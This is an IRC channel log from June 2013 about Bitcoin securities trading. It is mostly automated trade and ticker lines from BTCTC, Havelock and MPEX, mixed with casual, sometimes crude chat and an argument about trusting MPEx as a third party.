your bride with btc? Jun 02 20:11:57 you stole the btc? Jun 02 20:12:26 [HAVELOCK] [ASICM] 410 @ 0.0246 = 10.086 BTC [+] Jun 02 20:13:47 does she know how to cook? Jun 02 20:13:56 is she good in bed? Jun 02 20:14:17 can she discuss quantum physics knowledgably? Jun 02 20:14:36 not my type =/ Jun 02 20:14:42 lol Jun 02 20:15:26 no, and maybe. Jun 02 20:16:05 [BTCTC] [COGNITIVE] 1 @ 0.337999 BTC [+] Jun 02 20:16:12 [BTCTC] [COGNITIVE] 2 @ 0.338 = 0.676 BTC [+] Jun 02 20:16:12 [BTCTC] [PAJKA.BOND] 2 @ 0.109968 = 0.2199 BTC [+] Jun 02 20:16:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.024549 BTC [+] Jun 02 20:17:55 im with D3, lack of knowledge in QM is a boner killer Jun 02 20:19:03 [HAVELOCK] [ASICM] 20 @ 0.0249 = 0.498 BTC [+] Jun 02 20:19:12 [BTCTC] [GSDPT] 47 @ 0.0026 = 0.1222 BTC [-] Jun 02 20:23:24 [HAVELOCK] [ASICM] 36 @ 0.02485 = 0.8946 BTC [-] Jun 02 20:23:25 [HAVELOCK] [ASICM] 64 @ 0.02495 = 1.5968 BTC [+] Jun 02 20:29:47 17:18 < Chaang-Noi> however if the dialog is there it might be worth it Jun 02 20:29:49 ROFLMFAO Jun 02 20:30:07 Chaang-Noi: i feel kinda bad for rp now lol Jun 02 20:30:30 flash mini-crash while money is in transit Jun 02 20:30:32 what2do Jun 02 20:30:59 no lol not me Jun 02 20:32:04 [HAVELOCK] [VTX] 1 @ 0.425 BTC [+] Jun 02 20:34:26 [BTCTC] [ASICMINER-PT] 1 @ 2.474999 BTC [+] Jun 02 20:34:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4787 BTC [+] Jun 02 20:34:32 [BTCTC] [ASICMINER-PT] 8 @ 2.47877 = 19.8302 BTC [+] Jun 02 20:35:09 Chaang-Noi, did mpex scammed you or what? Jun 02 20:38:19 [BTCTC] [RSM] 2 @ 0.008779 = 0.0176 BTC [-] Jun 02 20:38:40 well, to everyone their own. am in no mood for flamewar her nor in that thread. Jun 02 20:38:49 *here Jun 02 20:39:32 [HAVELOCK] [VTX] 4 @ 0.425 = 1.7 BTC [+] Jun 02 20:40:01 you wrote: The third party is Mpex, this does not solve the trust problem for all. Jun 02 20:40:48 so mpex can't be trusted either, how else should i understand it? Jun 02 20:41:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.02454 = 0.2945 BTC [-] Jun 02 20:46:24 [HAVELOCK] [ASICM] 68 @ 0.024946 = 1.6963 BTC [-] Jun 02 20:49:04 how does it not solves the trust problem? Jun 02 20:49:43 i don't get you. of course mp is the third party. and? Jun 02 20:51:13 [BTCTC] [ASICMINER-PT] 8 @ 2.437102 = 19.4968 BTC [-] Jun 02 20:51:34 you could clearly write that *you* don't trust him. that was what i actually understood, but it was very unclearly written Jun 02 20:53:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02454 BTC [-] Jun 02 20:53:17 [BTCTC] [ASICMINER-PT] 3 @ 2.47799 = 7.434 BTC [+] Jun 02 20:53:27 [BTCTC] [S.DICE-PT] 1 @ 0.002579 BTC [+] Jun 02 20:53:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0245 = 0.1225 BTC [-] Jun 02 20:55:05 yes you only stated FUDdily that there is some "trust problem". Jun 02 20:55:36 :) Jun 02 20:56:56 hm, so you want someone who everyone can trust? only then will the "problem" be solved? Jun 02 20:57:06 I trust no one Jun 02 20:57:07 [BTCTC] [PAJKA.BOND] 3 @ 0.109968 = 0.3299 BTC [+] Jun 02 20:57:08 except people who fry cats Jun 02 20:57:48 so then the problem is unsolveble for you anyway and you're just FUDding Jun 02 20:59:12 this is all i got for the clarkmoody chart. apparently bitcoin really is going to infinity ^^ http://dl.dropboxusercontent.com/u/58484258/Screenshots/7gkx.png Jun 02 20:59:26 BTCUSD ticker | Best bid: 121.35001, Best ask: 121.54007, Bid-ask spread: 0.19006, Last trade: 121.54009, 24 hour volume: 96018.37249904, 24 hour low: 115.00000, 24 hour high: 130.10000, 24 hour vwap: 122.22318 Jun 02 20:59:31 mpex is the solution for me. so for me it has a solution. for you it doesn't have a solution. problem solved. Jun 02 21:00:07 BTCUSD ticker | Best bid: ∞, Best ask: ∞+1 Jun 02 21:00:50 [HAVELOCK] [ASICM] 2 @ 0.024925 = 0.0499 BTC [-] Jun 02 21:02:00 choosing someone to trust is the solution, not the problem. unless you want it to be so. Jun 02 21:02:50 somebody in troll box around 6AM EST told me this was coming Jun 02 21:03:11 yeh on btce Jun 02 21:03:16 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [+] Jun 02 21:03:20 i didnt believe him lol goddamn trollbox Jun 02 21:03:29 that's becuase a troll is programmed to say that every 30 mins Jun 02 21:03:34 lol Jun 02 21:05:15 then you are okay with you trusting me as the third party? << how does that follow? Jun 02 21:07:17 lol, so now i'm to trust everyone? to prove to you i solved my problem or what? Jun 02 21:08:32 yes i proposed to solve it using mpex as trusted party. Jun 02 21:08:45 loool Jun 02 21:09:27 i'm not sure who looks like a fool there Jun 02 21:10:59 as i said, no mood to flame, especially when i don't see your point. Jun 02 21:12:25 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [+] Jun 02 21:12:39 either the third party problem is fundamentally unsolvable(but then why bitch about it?)... or it can be solved by choosing trusted third party. Jun 02 21:12:51 but you seem to reject both answers Jun 02 21:12:56 [BTCTC] [BTC-GOLD] 2 @ 0.0215 = 0.043 BTC [+] Jun 02 21:13:07 and bitch instead :D Jun 02 21:13:08 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [-] Jun 02 21:14:15 where did i say mpex isn't a third party? Jun 02 21:15:09 [BTCTC] [BASIC-MINING] 2 @ 0.6613 = 1.3226 BTC [-] Jun 02 21:15:14 [HAVELOCK] [ASICM] 2 @ 0.02491 = 0.0498 BTC [-] Jun 02 21:15:35 but, from my POV, i was not wrong too :D Jun 02 21:17:33 [BTCTC] [COGNITIVE] 1 @ 0.337797 BTC [-] Jun 02 21:18:21 yes. to rephrase: "MPEx and Bitfunder established themselves as trustable enterprises to solve the trusted 3rd party problem." Jun 02 21:18:35 [BTCTC] [COGNITIVE] 3 @ 0.337798 = 1.0134 BTC [+] Jun 02 21:18:39 [BTCTC] [PAJKA.BOND] 2 @ 0.109968 = 0.2199 BTC [+] Jun 02 21:19:19 they solved it clearly better than theymos Jun 02 21:19:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.024499 = 0.1225 BTC [-] Jun 02 21:19:44 [BTCTC] [COGNITIVE] 6 @ 0.338 = 2.028 BTC [+] Jun 02 21:20:32 so you are implying i said they solved it absolutely? Jun 02 21:22:01 so i should inject "mostly", "probably", "likely" into everything from now on? Jun 02 21:22:07 i would hate to see the home made porn you guys might evar make < If there ever was a valid reason for censorship on the interwebs... Jun 02 21:24:56 "Theymos has been involved in more than one scam and has abused his power." << so this is a fact too? Jun 02 21:25:20 did anyone proved it beyond any doubt? Jun 02 21:26:09 well, i never know. i'm just having fun and looking what will come out of it Jun 02 21:27:15 i don't feel much need to defend myself. i wanted to understand. Jun 02 21:27:50 now i'm aware that if i say "mpex solved something" it may stroke some people against fur. good to know. Jun 02 21:28:54 [BTCTC] [TAT.ASICMINER] 8 @ 0.024499 = 0.196 BTC [-] Jun 02 21:28:57 so, i should do "imo", "imho" but you don't need to? Jun 02 21:30:45 loool what would you say if you were harsh? Jun 02 21:31:01 you can say it here, we aren't banning you :D Jun 02 21:37:45 TF posted the pic, hence he's a hacker... impeccable logic here Jun 02 21:38:01 [BTCTC] [B.YABMC] 8 @ 0.01776 = 0.1421 BTC [+] Jun 02 21:38:28 [BTCTC] [TAT.ASICMINER] 46 @ 0.0245 = 1.127 BTC [+] Jun 02 21:41:02 bye Jun 02 21:41:47 so that vorobyov guy sells calls with breakeven at 142, nice. Jun 02 21:42:18 [HAVELOCK] [ASICM] 600 @ 0.02461 = 14.766 BTC [-] Jun 02 21:42:19 [HAVELOCK] [ASICM] 1 @ 0.024604 BTC [-] Jun 02 21:42:19 [HAVELOCK] [ASICM] 352 @ 0.0246 = 8.6592 BTC [-] Jun 02 21:46:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [+] Jun 02 21:48:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.024499 = 0.196 BTC [-] Jun 02 21:48:57 [BTCTC] [TAT.ASICMINER] 12 @ 0.0245 = 0.294 BTC [+] Jun 02 21:51:50 [HAVELOCK] [ASICM] 28 @ 0.024601 = 0.6888 BTC [+] Jun 02 21:51:52 [HAVELOCK] [ASICM] 1372 @ 0.0246 = 33.7512 BTC [-] Jun 02 21:52:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4775 BTC [-] Jun 02 21:54:05 [MPEX] [S.MPOE] 828 @ 0.00072162 = 0.5975 BTC [+] Jun 02 21:54:07 [MPEX] [S.MPOE] 11272 @ 0.00072176 = 8.1357 BTC [+] Jun 02 21:55:50 [BTCTC] [ASICMINER-PT] 1 @ 2.459 BTC [-] Jun 02 21:57:54 [BTCTC] [TAT.ASICMINER] 6 @ 0.02455 = 0.1473 BTC [+] Jun 02 22:04:12 [HAVELOCK] [ASICM] 9 @ 0.0246 = 0.2214 BTC [-] Jun 02 22:05:24 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1806 = 0.5418 BTC [-] Jun 02 22:06:18 [BTCTC] [CRYPTO-TRADE] 5 @ 0.180502 = 0.9025 BTC [-] Jun 02 22:06:44 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1805 = 0.722 BTC [-] Jun 02 22:08:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.024115 = 0.2894 BTC [-] Jun 02 22:08:53 [HAVELOCK] [ASICM] 2 @ 0.0246 = 0.0492 BTC [-] Jun 02 22:09:40 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] Jun 02 22:12:49 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] Jun 02 22:16:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.024686 = 0.1975 BTC [+] Jun 02 22:22:45 [MPEX] [S.MPOE] 478 @ 0.00072176 = 0.345 BTC [+] Jun 02 22:22:47 [MPEX] [S.MPOE] 4022 @ 0.00072227 = 2.905 BTC [+] Jun 02 22:23:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.024685 = 0.2962 BTC [-] Jun 02 22:24:35 [BTCTC] [TAT.ASICMINER] 29 @ 0.024686 = 0.7159 BTC [+] Jun 02 22:40:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.024669 = 0.0493 BTC [-] Jun 02 22:44:44 [MPEX] [S.MPOE] 10900 @ 0.00071976 = 7.8454 BTC [-] Jun 02 22:46:12 [HAVELOCK] [ASICM] 40 @ 0.02433 = 0.9732 BTC [-] Jun 02 22:46:14 [HAVELOCK] [ASICM] 150 @ 0.02432001 = 3.648 BTC [-] Jun 02 22:48:59 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 02 22:53:35 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Jun 02 22:53:37 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 02 23:00:50 [BTCTC] [ASICMINER-PT] 4 @ 2.459 = 9.836 BTC [-] Jun 02 23:06:40 [HAVELOCK] [SDICE] 1 @ 0.2341 BTC [-] Jun 02 23:12:08 [BTCTC] [PAJKA.BOND] 2 @ 0.10997 = 0.2199 BTC [+] Jun 02 23:21:13 [BTCTC] [BITVPS] 1 @ 0.00084 BTC [+] Jun 02 23:21:37 [BTCTC] [GSDPT] 4 @ 0.0026 = 0.0104 BTC [-] Jun 02 23:21:54 ;;nethash Jun 02 23:21:55 122191.65627 Jun 02 23:21:55 [BTCTC] [BITVPS] 1 @ 0.000849 BTC [+] Jun 02 23:21:59 wow Jun 02 23:22:04 ;;bc,stats Jun 02 23:22:06 Current Blocks: 239338 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 565 blocks | Next Difficulty In About: 2 days, 17 hours, 30 minutes, and 26 seconds | Next Difficulty Estimate: 15015498.3415 | Estimated Percent Change: 23.54966 Jun 02 23:22:16 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] Jun 02 23:24:36 [BTCTC] [BITVPS] 1 @ 0.000849 BTC [+] Jun 02 23:28:50 [BTCTC] [ASICMINER-PT] 1 @ 2.4735 BTC [+] Jun 02 23:28:54 [HAVELOCK] [ASICM] 1 @ 0.024799 BTC [+] Jun 02 23:29:36 [BTCTC] [ASICMINER-PT] 2 @ 2.474 = 4.948 BTC [+] Jun 02 23:29:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.02456 BTC [-] Jun 02 23:29:55 [BTCTC] [TAT.ASICMINER] 65 @ 0.02455 = 1.5958 BTC [-] Jun 02 23:29:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] Jun 02 23:30:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.0245 = 0.1715 BTC [-] Jun 02 23:32:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] Jun 02 23:33:30 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [+] Jun 02 23:34:25 [BTCTC] [TAT.ASICMINER] 22 @ 0.024202 = 0.5324 BTC [-] Jun 02 23:37:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.024202 BTC [-] Jun 02 23:40:30 [MPEX] [S.MPOE] 4321 @ 0.00072376 = 3.1274 BTC [+] Jun 02 23:40:32 [MPEX] [S.MPOE] 1929 @ 0.00072411 = 1.3968 BTC [+] Jun 02 23:40:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.024114 BTC [-] Jun 02 23:41:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.024112 = 0.1929 BTC [-] Jun 02 23:41:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.0241 = 0.241 BTC [-] Jun 02 23:41:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.024 = 0.072 BTC [-] Jun 02 23:41:44 [BTCTC] [TAT.ASICMINER] 30 @ 0.024 = 0.72 BTC [-] Jun 02 23:43:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.023901 BTC [-] Jun 02 23:43:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.023901 BTC [-] Jun 02 23:45:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.02275 = 0.4323 BTC [-] Jun 02 23:47:33 [HAVELOCK] [ASICM] 35 @ 0.024799 = 0.868 BTC [+] Jun 02 23:59:03 [BTCTC] [ASICMINER-PT] 1 @ 2.4766 BTC [+] Jun 03 00:01:40 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] **** BEGIN LOGGING AT Mon Jun 3 15:37:37 2013 Jun 03 15:37:41 ;;ticker Jun 03 15:37:42 BTCUSD ticker | Best bid: 117.00001, Best ask: 117.17689, Bid-ask spread: 0.17688, Last trade: 117.17689, 24 hour volume: 51045.44233672, 24 hour low: 115.00000, 24 hour high: 123.23187, 24 hour vwap: 118.17462 Jun 03 15:40:02 mp, looks like mpex is done for, some guy is manually selling options on the forum using ripple Jun 03 15:40:10 [BTCTC] [PAJKA.BOND] 5 @ 0.1098 = 0.549 BTC [-] Jun 03 15:40:23 was nice knowing you Jun 03 15:40:31 [BTCTC] [PAJKA.BOND] 15 @ 0.1099 = 1.6485 BTC [+] Jun 03 15:40:43 lol ty. Jun 03 15:40:47 :) Jun 03 15:40:54 you know how many peeps have been selling options since 2011 ? Jun 03 15:41:05 for that matter,y ou knwo some guy made a straight clone last year ? Jun 03 15:41:11 heh Jun 03 15:41:21 i mean literally, exact same design. and then PRETENDED HE DIDN'T CLONE IT Jun 03 15:41:55 he couldve at least owned it Jun 03 15:42:07 and then he had a team of experts Jun 03 15:42:12 dont we all? Jun 03 15:42:14 and then he was going to take over Jun 03 15:42:20 my team is cranking away right behind me Jun 03 15:42:25 and then wasn't heard from again Jun 03 15:42:39 a team of cats Jun 03 15:42:41 and i can't even remember his name or anything Jun 03 15:42:53 lol a herd of milk cats. for to make cheshire cheez. Jun 03 15:43:02 hehe Jun 03 15:46:49 [MPEX] [S.MPOE] 4321 @ 0.00072016 = 3.1118 BTC [+] Jun 03 15:46:51 [MPEX] [S.MPOE] 13329 @ 0.0007201 = 9.5982 BTC [-] Jun 03 15:58:27 [HAVELOCK] [ASICM] 150 @ 0.02489 = 3.7335 BTC [+] Jun 03 15:59:34 [HAVELOCK] [SDICE] 2 @ 0.2335 = 0.467 BTC [-] Jun 03 15:59:54 [HAVELOCK] [SDICE] 8 @ 0.2335 = 1.868 BTC [-] Jun 03 16:00:48 [BTCTC] [PAJKA.BOND] 15 @ 0.08 = 1.2 BTC [-] Jun 03 16:01:00 kakobrekla http://trilema.com/2013/bitbet-may-2013-statement/ Jun 03 16:01:15 [MPEX] [S.MPOE] 17350 @ 0.0007201 = 12.4937 BTC [-] Jun 03 16:03:55 [MPEX] [S.BBET] 600 @ 0.00149999 = 0.9 BTC [-] Jun 03 16:13:30 mp, random idea/question, why not convert mpoe into a merge with your 30btc mpex seats to form a board as one tradable asset Jun 03 16:13:39 allowing people to sell their mpex seats Jun 03 16:13:51 but tying dividends to those seats Jun 03 16:13:55 instead of mpoe Jun 03 16:14:36 you could then make a cut on the trade of bot "mpoe" and mpex seats Jun 03 16:14:42 both* Jun 03 16:14:54 [MPEX] [S.MPOE] 3000 @ 0.00072048 = 2.1614 BTC [+] Jun 03 16:14:56 [BTCTC] [GSDPT] 49 @ 0.0029 = 0.1421 BTC [+] Jun 03 16:15:21 ties everything into one (i think) elegant setup Jun 03 16:16:10 because there is absolutely no relation between the two concepts ? Jun 03 16:16:39 i'm saying to make one Jun 03 16:17:13 i didnt fully bake the idea or anything Jun 03 16:17:13 but this isn't how it works. you don't abstractly create relations between unrelated in fact items Jun 03 16:17:19 but i think there's a concept in there somewhere Jun 03 16:17:22 what if i went down the street, picked two women and went Jun 03 16:17:30 "hey, you two. you're now married. eat each other out!" Jun 03 16:17:57 i'm just theorizing that their may be a way to make mpex seats tradable Jun 03 16:18:15 not offering a total solution Jun 03 16:18:18 just ideas Jun 03 16:18:25 <__blasty> women eating each other out, I'm all ears Jun 03 16:20:30 [HAVELOCK] [SDICE] 2 @ 0.2335 = 0.467 BTC [-] Jun 03 16:20:56 [MPEX] [S.MPOE] 11700 @ 0.00072142 = 8.4406 BTC [+] Jun 03 16:21:21 the key issue, is that the "seat" is just a private key...as we know with bitcoins, how do you sell a private key? Jun 03 16:21:46 'the key issue' Jun 03 16:21:46 no matter what, there is no way to guarantee that there isn't another copy Jun 03 16:21:51 https://bitcointalk.org/index.php?topic=223665 Jun 03 16:22:02 ahahaha dude this is the best lolgold Jun 03 16:29:11 https://bitcointalk.org/index.php?topic=224057.0 Jun 03 16:29:15 death and taxes out of business. Jun 03 16:32:38 ThickAsThieves hey, did you mean the vobyrov dude ? Jun 03 16:33:14 yes, him Jun 03 16:33:48 it even started funny philosophical debate between me and goat Jun 03 16:34:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.02488 = 0.2737 BTC [+] Jun 03 16:35:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.024888 = 0.1244 BTC [+] Jun 03 16:35:29 ThickAsThieves hey, did you mean the vobyrov dude ? <<< yessir Jun 03 16:35:39 a, i recall he was bitching about mpoe last summer. Jun 03 16:35:54 "how can you make a loss with those spreads !!11" and other amateruness. Jun 03 16:36:19 you'd think if he was serious he'd make a real engine Jun 03 16:36:39 even if i was interested in what he's selling Jun 03 16:36:45 i don't wanna deal over a forum Jun 03 16:36:48 nor over ripple Jun 03 16:36:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.0249 = 0.6225 BTC [+] Jun 03 16:36:53 ya well. Jun 03 16:37:35 he would sell me C130T equivalent that breaks even at 142. clearly loss is not conceivable. Jun 03 16:37:38 the end of dt is a lot more important news tbh. pretty soon the us will be cut off from btc completely. Jun 03 16:37:56 jurov clearly. Jun 03 16:39:13 [BTCTC] [ASICMINER-PT] 1 @ 2.47345 BTC [-] Jun 03 16:39:17 i think US just wants all the dataz Jun 03 16:39:36 as long as every tx goes through ACH Jun 03 16:39:42 or is under AML/KYC Jun 03 16:39:51 and under a MSB Jun 03 16:39:56 then you're fine! Jun 03 16:41:24 heh. Jun 03 16:41:54 this latest event is clear proof this ain't the case. the guy was meticulously keeping track of customers. Jun 03 16:42:06 which is why this is important : proof that no, they don't just want the data. Jun 03 16:42:11 but he is unlicensed no? Jun 03 16:42:17 no. Jun 03 16:42:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.0249 = 0.0996 BTC [+] Jun 03 16:42:21 and it was a state that stopped him Jun 03 16:42:25 not the fed Jun 03 16:42:36 from what i gather (may be wrong) Jun 03 16:42:47 he got the fincen reg and was in the process of licensing Jun 03 16:43:02 [HAVELOCK] [ASICM] 1 @ 0.02481 BTC [-] Jun 03 16:44:57 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Jun 03 16:44:59 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [+] Jun 03 16:45:00 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 03 16:45:02 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 03 16:47:03 http://labs.ft.com/2013/05/a-sobering-day/ Jun 03 16:47:11 pretty good read re phishing Jun 03 16:52:01 [BTCTC] [B.YABMC] 10 @ 0.01822 = 0.1822 BTC [+] Jun 03 16:52:30 [BTCTC] [TAT.ASICMINER] 87 @ 0.02489 = 2.1654 BTC [-] Jun 03 16:54:36 [BTCTC] [BASIC-MINING] 1 @ 0.679799 BTC [+] Jun 03 16:54:37 [BTCTC] [BASIC-MINING] 2 @ 0.6798 = 1.3596 BTC [+] Jun 03 16:54:38 [BTCTC] [BASIC-MINING] 9 @ 0.67995 = 6.1196 BTC [+] Jun 03 16:54:40 [BTCTC] [BASIC-MINING] 26 @ 0.67999 = 17.6797 BTC [+] Jun 03 16:54:43 [BTCTC] [BASIC-MINING] 45 @ 0.68 = 30.6 BTC [+] Jun 03 17:01:45 Great article Mircea Popescu. Thanks. I have forwarded this on to management in the corporate levels for the company I work for. Jun 03 17:02:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02489 = 0.0747 BTC [-] Jun 03 17:02:11 [BTCTC] [TAT.ASICMINER] 17 @ 0.02489 = 0.4231 BTC [-] Jun 03 17:03:38 [BTCTC] [PAJKA.BOND] 2 @ 0.08 = 0.16 BTC [-] Jun 03 17:04:07 Yeah I send spam but I'm often thanked for it. I'm a sysadmin 14+ yrs..I touch everything from web servers to SAN's and switches, virtualization, I.T. security. Jun 03 17:05:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [-] Jun 03 17:05:22 only the good stuff though Jun 03 17:06:52 [MPEX] [S.MPOE] 2450 @ 0.00072206 = 1.769 BTC [+] Jun 03 17:08:16 [BTCTC] [S.DICE-PT] 2 @ 0.00257 = 0.0051 BTC [-] Jun 03 17:12:12 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [-] Jun 03 17:12:14 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [-] Jun 03 17:12:22 ;;next Jun 03 17:12:24 retracement targets: 125-127 | #bitcoin [Sun, 02 Jun 2013 17:33:08 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 20 hours, 39 minutes, and 13 seconds ago Jun 03 17:13:20 at first i though OneFixt wasn't worth following, but he's turning out to be pretty good at this Jun 03 17:16:29 all boxes ticked Jun 03 17:16:59 [BTCTC] [B.YABMC] 10 @ 0.016 = 0.16 BTC [-] Jun 03 17:17:03 [BTCTC] [B.YABMC] 23 @ 0.015602 = 0.3588 BTC [-] Jun 03 17:17:05 [BTCTC] [B.YABMC] 100 @ 0.015601 = 1.5601 BTC [-] Jun 03 17:17:06 [BTCTC] [B.YABMC] 1 @ 0.01556 BTC [-] Jun 03 17:17:08 [BTCTC] [B.YABMC] 4 @ 0.0155 = 0.062 BTC [-] Jun 03 17:17:09 [BTCTC] [B.YABMC] 100 @ 0.015005 = 1.5005 BTC [-] Jun 03 17:17:11 [BTCTC] [B.YABMC] 40 @ 0.015 = 0.6 BTC [-] Jun 03 17:22:30 Chaang-Noi: you said it bro..I'd rather go to hell.. oh wait I'm already there. Jun 03 17:32:49 KRS1 fwiw i don't buy his entire "had the tab open must have acciodentally typed in" theory. Jun 03 17:36:44 [BTCTC] [RSM] 10 @ 0.008766 = 0.0877 BTC [+] Jun 03 17:39:09 [BTCTC] [S.MPOE-PT] 16 @ 0.000706 = 0.0113 BTC [+] Jun 03 17:40:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [-] Jun 03 17:44:04 [HAVELOCK] [ASICM] 41 @ 0.02481 = 1.0172 BTC [-] Jun 03 17:50:49 Make me sad, I loved getting checks in the mail for BTC sales.. felt so good. Jun 03 17:50:53 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 03 17:50:55 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 03 17:50:58 If anyone can beat this it's TC Jun 03 17:51:22 realistically i don't imagine he can justify the costs of so doing. Jun 03 17:52:25 [BTCTC] [BASIC-MINING] 8 @ 0.66 = 5.28 BTC [-] Jun 03 17:52:26 [BTCTC] [BASIC-MINING] 1 @ 0.687899 BTC [+] Jun 03 17:52:28 [BTCTC] [BASIC-MINING] 1 @ 0.6879 BTC [+] Jun 03 17:52:29 [BTCTC] [BASIC-MINING] 4 @ 0.689 = 2.756 BTC [+] Jun 03 17:53:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.02487 = 0.1492 BTC [-] Jun 03 17:54:06 [MPEX] [S.MPOE] 4600 @ 0.00072142 = 3.3185 BTC [-] Jun 03 17:54:08 [MPEX] [S.MPOE] 9321 @ 0.0007201 = 6.7121 BTC [-] Jun 03 17:54:09 [MPEX] [S.MPOE] 929 @ 0.00071963 = 0.6685 BTC [-] Jun 03 17:55:30 [MPEX] [S.MPOE] 5650 @ 0.00072206 = 4.0796 BTC [+] Jun 03 17:55:31 [MPEX] [S.MPOE] 3400 @ 0.00072261 = 2.4569 BTC [+] Jun 03 17:57:02 depends on that cost, I don't think it's been discovered yet. Historically it's probably too high to pursue. Jun 03 17:57:07 wish we could help. Jun 03 17:59:59 could someone with an account at coinlenders perhaps tell me what the rates are like there? Jun 03 18:00:18 they have a page Jun 03 18:00:21 that spells it out Jun 03 18:00:36 hmm, I didn't find it Jun 03 18:00:41 https://www.coinlenders.com/interest Jun 03 18:01:23 [MPEX] [S.MPOE] 12892 @ 0.00071963 = 9.2775 BTC [-] Jun 03 18:01:24 [MPEX] [S.MPOE] 3002 @ 0.00071866 = 2.1574 BTC [-] Jun 03 18:04:32 I was thinking of borrowing, not depositing money to gain interest.. Jun 03 18:04:50 ah Jun 03 18:04:54 [BTCTC] [TAT.ASICMINER] 13 @ 0.024686 = 0.3209 BTC [-] Jun 03 18:05:03 probly gives you a good idea tho Jun 03 18:05:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.024686 = 0.0741 BTC [-] Jun 03 18:05:54 are we still talking about TC? Jun 03 18:06:07 The US government is being a poopoo. Jun 03 18:06:32 [BTCTC] [TAT.ASICMINER] 13 @ 0.02451 = 0.3186 BTC [-] Jun 03 18:07:35 just noticed btcjam doesn't show APR for the listings, annoying. Jun 03 18:08:24 [BTCTC] [ASICMINER-PT] 1 @ 2.456101 BTC [-] Jun 03 18:09:00 nice, your IPO is almost finished eh TAT 8-) Jun 03 18:09:51 mircea_popescu: You were right again about the magical bureaucrat yet again... Jun 03 18:10:01 I can't get out of this country fast enough... Jun 03 18:10:36 saulimus afaik it is not open to borrow, it's just tradefortress' private bond. Jun 03 18:11:33 mircea_popescu: do you have a list of countries that view BTC in the same way as romania. As smickles once said: "WoW money". Jun 03 18:11:55 not rly. Jun 03 18:12:08 if I compose one would you help edit/publish? Jun 03 18:12:19 but as a general rule of thumb, if they don't speak english they probably don't have the english brain rot either. Jun 03 18:12:38 sounds like a difficult thing, you're not a lawyer. how'd you compose one ? Jun 03 18:13:51 Good point. That's why I said "edit" perhaps you can help get more motion behind it. Maybe call it a "safe countries list". Jun 03 18:15:05 this is niot how it works. they who are worth millions hire a consultant. those who aren't worth millions pray. Jun 03 18:17:12 I was one told consultants are people you hire to steal your watch to tell you what time it is... Jun 03 18:17:17 once* Jun 03 18:18:27 [BTCTC] [ASICMINER-PT] 19 @ 2.475 = 47.025 BTC [+] Jun 03 18:18:29 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [+] Jun 03 18:18:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02487 BTC [+] Jun 03 18:18:43 Chaang-Noi, seems pretty cut and dry, they only buy BTC.... glad you think they will too. Jun 03 18:19:24 [BTCTC] [ASICMINER-PT] 7 @ 2.456103 = 17.1927 BTC [-] Jun 03 18:19:38 Chaang-Noi: Is it super illegal to smoke pot in Thailand like Vietnam? Jun 03 18:19:52 My friend said the pot posession in Vietnam is a capital offense. Jun 03 18:19:56 jeezus Jun 03 18:20:00 He also said there was a white people tax. Jun 03 18:20:12 cracker tax, I like it Jun 03 18:20:12 [BTCTC] [ASICMINER-PT] 10 @ 2.477 = 24.77 BTC [+] Jun 03 18:20:30 ah Jun 03 18:21:24 i always thought bought would be a decent addition to any spice rack Jun 03 18:21:28 pot Jun 03 